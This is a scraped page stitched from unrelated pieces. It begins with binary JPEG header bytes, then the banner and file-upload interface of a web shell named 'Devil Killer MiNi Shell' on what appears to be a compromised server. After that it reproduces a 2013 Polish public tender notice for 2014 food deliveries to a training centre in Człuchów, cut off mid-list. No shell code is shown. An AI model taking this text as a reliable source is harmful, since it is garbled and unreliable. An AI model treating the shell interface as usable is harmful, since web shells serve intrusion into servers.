JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131011/414856-N-2013.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w 2014 r.</b><br>
<b>Numer ogłoszenia: 414856 - 2013; data zamieszczenia: 11.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorskie.eu/pl/bip/ohp  http://www.pomorska.ohp.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -UWAGA WAŻNE !!! Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
-UWAGA WAŻNE !!! Pełnomocnictwo do reprezentowania wykonawcy musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).
-UWAGA WAŻNE !!! Niedopuszczalne jest zmienianie asortymentu w formularzach cenowych np. wpisywanie asortymentów o innej gramaturze, innej ilości,  itp. 
Dokonanie wszelkich zmian  w formularzach cenowych będzie skutkowało odrzuceniem oferty wykonawcy na podstawie art. 89 ust 1 pkt. 2 uPzP. 
-Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie od 1 stycznia 2014 r.  do dnia 31 grudnia 2014 roku do: Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4. 
-Przedmiot zamówienia podzielono na siedemnaście zadań częściowych:
Zadanie	1. owoce świeże
Zadanie	2. owoce przetworzone
Zadanie	3. warzywa świeże
Zadanie	4. warzywa przetworzone 
Zadanie	5. mrożonki
Zadanie	6. jaja
Zadanie	7. mięso i produkty mięsne
Zadanie	8. drób
Zadanie	9. wędliny i produkty wędliniarskie
Zadanie	10. pasztety i konserwy
Zadanie	11. ryby i przetwory
Zadanie	12. pieczywo i ciasto
Zadanie	13. produkty skrobi 
Zadanie	14 produkty spożywcze różne
Zadanie	15 oleje i tłuszcze roślinne
Zadanie	16 produkty mleczarskie
Zadanie	17 napoje
Zadanie	18. owoce świeże
Zadanie	19. owoce przetworzone
Zadanie	20. warzywa świeże
Zadanie	21. warzywa przetworzone 
Zadanie	22. jaja
Zadanie	23. mięso i produkty mięsne
Zadanie	24. ryby i przetwory
Zadanie	25. produkty skrobi 
Zadanie	26 produkty spożywcze różne
Zadanie	27 oleje i tłuszcze roślinne
Zadanie	28 produkty mleczarskie
Zadanie	29. drób
-Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy).
-Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
-Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
-Cykliczne dostawy  będą realizowane jak następuje:  
-Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
-Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
-Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
-Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
-Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
-Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
-W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
-Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
-Do składania zamówień Zamawiający upoważni wybranego pracownika.
-Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
-W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
21.	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
-Wykonawca na żądanie zamawiającego ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
-Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 90 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 10 % wartości zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 03.14.25.00-3, 15.30.00.00-1, 15.81.00.00-9, 15.00.00.00-8, 15.13.11.10-9, 15.13.11.20-2, 15.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>12.1	W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp należy:
-złożyć oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 Pzp, wg wzoru na załączniku  do SIWZ. 
-wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy  kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 uPzP , tj. w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. Nr 50, poz. 331 z późn. zm.).   albo informację o tym, że nie należy do grupy kapitałowej.
12.2	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o którym mowa  w art. 22 ust. 1 ustawy Pzp, do oferty należy dołączyć:
-	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, w związku z art. 44 ustawy Pzp, wzór oświadczenia stanowi załączniku do SIWZ.
12.3	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, będzie polegał na wiedzy i doświadczeniu i/lub na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp., niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu: pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału).
12.4	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 pkt 1-4 PzP składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.
12.5	Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów według formuły spełnia -nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
12.6	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
-Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
-	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
-	Wykonawcy, o których mowa w punkcie 1 składają jedną ofertę, przy czym:
A.	Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-	Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
-	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć formę prawną konsorcjum zawiązanego w drodze umowy cywilnej. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia:
-	określenie zasad reprezentacji i odpowiedzialności w sposób czytelny, nie budzący żadnej wątpliwości;
-	określenie celu gospodarczego;
-	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji  przedmiotu zamówienia i okres gwarancji;
-wykluczenie możliwości wypowiedzenia umowy przez któregokolwiek z jej członków do czasu wykonania zamówienia bez zgody Zamawiającego i upływu  okresu gwarancji;
-zakaz dokonywania zmian w umowie bez zgody Zamawiającego.
-Ocena spełnienia przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów wg formuły spełnia/nie spełnia w oparciu o informacje zawarte w oświadczeniach wyszczególnionych w pkt. 12  niniejszej SIWZ.  Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
-Wykonawcy, występujący wspólnie składają jedną ofertę, przy czym:
-Załącznik do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-Załącznik do SIWZ (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
-Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
-W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
-Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
-Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
-W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorska.ohp.pl/ http://www.pomorskie.eu/pl/bip/ohp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie	1. owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	160
banany	kg	200
brzoskwinie	kg	80
cytryny	kg	20
czereśnie	kg	5
gruszki	kg	30
jabłka	kg	400
kiwi	kg	10
kiwi	szt	90
nektaryny	kg	43
mandarynki	kg	50
pomarancza	kg	30
pomarańcza siatka	kg	30
truskawki	kg	20
wisnie	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie	2. owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany400-500g	szt	60
brzoskwinie kons.0.9	szt	30
Dżem  słoik 220/260 ml	szt	120
kompot  0,9l	szt	30
kompot wiśniowy 0,9 l	szt	30
sok owocowy 2l ( różne smaki - pomarańczowy, grejfrut, jabułko, cz. Pożeczka, mix itp..	szt	30
sok owocowy 1l( różne smaki- pomarań, gruszka, wiśnia, grejfrut, mix.itp.)	szt	40
sok  typu owocowo, warzywon- owocowe( marchew-trusk-banan,marchew-malina-banan, marchew-banan, itp..) 220ml	szt	360
syrop owocowy 0,5l	l	150
syrop owocowy 1l	l	10
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie	3. warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	25
burak	kg	350
brokuł	szt	10
cebula	kg	500
cebula młoda	kg	50
cebula czerwona	kg	5
czosnek	kg	5
fasola jaś 	szt	50
fasola drobna 5kg	kg	15
fasola drobna 0,4 kg	szt	20
fasola jaś	kg	35
fasola szparagowa	kg	20
groch łuskany	kg	30
kabaczek	kg	25
kapusta czerwona	kg	60
kapusta młoda	szt	100
kapusta	kg	650
kapusta pekińska	kg	200
kapusta pekińska	szt	50
kapusta włoska	kg	20
kalafior	szt	15
koper	szt	100
koper duży	szt	10
marchew młoda	kg	100
marchew myta	kg	500
ogórek gruntowy	kg	20
ogórek świeży	kg	150
papryka świeża	kg	20
pietruszka korzeń	kg	250
pomidor	kg	250
por	szt	30
por	kg	110
rzodkiewka pęczki	szt	100
sałata	szt	20
